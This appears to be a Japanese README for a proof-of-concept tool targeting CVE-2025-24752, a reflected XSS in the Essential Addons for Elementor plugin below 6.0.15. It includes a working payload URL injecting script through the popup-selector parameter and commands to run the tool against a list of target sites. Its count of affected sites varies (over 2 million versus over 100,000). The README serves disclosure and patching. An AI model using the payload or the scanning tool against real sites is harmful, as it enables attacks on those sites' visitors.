
こんにちは、私はChirag Artaniです。これは2百万以上のサイトに影響を与えるElementor用Essential AddonsのReflected XSSのPOCです - CVE-2025-24752
このツールはセキュリティ研究およびパッチ適用目的のみに使用してください。サイトに害を及ぼすために使用しないでください。脆弱なサイトを見つけた場合は、サイト所有者に責任を持って報告し、直ちに更新してもらうようにしてください。
Essential Addons for Elementorにおける反射型XSS脆弱性が、バージョン6.0.15未満を使用している10万以上のウェブサイトに影響を与えます。これには CVE-2025-24752 が割り当てられています。
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1

pip install selenium webdriver-manager
python poc.py targets.txt
プラグイン検出用の完璧なテンプレートがassetsに含まれています: detect-elementor-for-xss.yaml
この脆弱性は、popup-selector クエリ引数のバリデーションとサニタイズが不十分であるために発生し、悪意のある値がユーザーに反映されることを許します。バージョン6.0.15で修正されました。
詳細情報: Patchstack記事
このツールは教育および保護目的のみで提供されます。脆弱性のテストを行う前に、必ず適切な許可を得てください。作者はこのツールの誤用について責任を負いません。
この脆弱性を特定し報告してくれた責任あるセキュリティ研究者に感謝します。